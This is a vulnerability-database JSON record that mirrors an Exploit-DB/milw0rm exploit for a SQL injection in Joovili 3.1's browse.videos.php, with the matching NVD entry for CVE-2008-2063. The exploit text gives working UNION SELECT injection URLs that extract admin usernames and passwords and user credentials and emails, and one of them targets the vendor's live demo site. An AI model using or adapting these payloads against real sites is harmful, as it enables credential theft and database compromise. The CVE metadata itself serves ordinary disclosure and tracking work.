{"id": "EDB-ID:5520", "hash": "6c444acdd52ed240d9e8232013120e5d", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Joovili 3.1 browse.videos.php category SQL Injection Vulnerability", "description": "Joovili 3.1 (browse.videos.php category) SQL Injection Vulnerability. CVE-2008-2063. Webapps exploit for php platform", "published": "2008-04-28T00:00:00", "modified": "2008-04-28T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/5520/", "reporter": "HaCkeR_EgY", "references": [], "cvelist": ["CVE-2008-2063"], "lastseen": "2016-01-31T22:14:01", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2016-01-31T22:14:01"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-2063"]}], "modified": "2016-01-31T22:14:01"}, "vulnersScore": 7.3}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/5520/", "sourceData": "#####################################################\n# [-Joovili-] \t\t #\n# Rem0te SQL Injection Vulnerability \t #\n# IN ==> browse.videos.php <==== \t #\n#####################################################\n \n[<>]Author: HaCkeR-EgY\n \n[<>]H^0mE: WWW.PAL-HACKER.COM , ATSDP.COM\n \n[<>]CONTact: hacker_EGY@hotmail.com\n================================================\n[<>]Script : Joovili\n[<>]version : Version 3.1.0\n[<>]price :$155 USD\n[<>]DOWNL0AD : www.joovili.com\n================================================\n[<>] D0RK : use your Mind (:\n \n[<>] Explo!t :\n\n[<>] 1 ====>http:hacker_egy/browse.videos.php?category=-1/**/union/**/select/**/1,2,3,concat_ws(0x3a3a,admin_username,admin_password),5,user(),7,8,9/**/from/**/joovili_admins/*\n\n[<>] 2 =====>http://hacker_egy/browse.videos.php?category=-1/**/union/**/select/**/1,2,3,concat_ws(0x3a3a,id,username,password,email),5,user(),7,8,9/**/from/**/joovili_users/*\n\n[<>] L!Ve DeM0 :\n \n====> http://demo.joovili.com/browse.videos.php?category=-1/**/union/**/select/**/1,2,3,concat_ws(0x3a3a,admin_username,admin_password),5,6,7,8,9/**/from/**/joovili_admins/*\n \n\n[<>]N0te :::>> 1- Sometime Requires to register\n &n bsp; 2- You can Find other Errors\n=======================================================\n[<>] Thanx : MY Brotha and MY Master \" Abo Mohamed \"\n[<>] Greetz : F!resell , Mohamed el Arab , MrExE , H-T Team [ HouSSaMix +\nToXiC350 ] , Gold_M , V4 Team , Jiki Team , RoMaNcYxHaCkEr , stR0ke\n\n# milw0rm.com [2008-04-28]\n", "osvdbidlist": ["44670"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2019-05-29T18:09:26", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in browse.videos.php in Joovili 3.1 allows remote attackers to execute arbitrary SQL commands via the category parameter.", "modified": "2017-09-29T01:30:00", "id": "CVE-2008-2063", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2063", "published": "2008-05-02T23:20:00", "title": "CVE-2008-2063", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}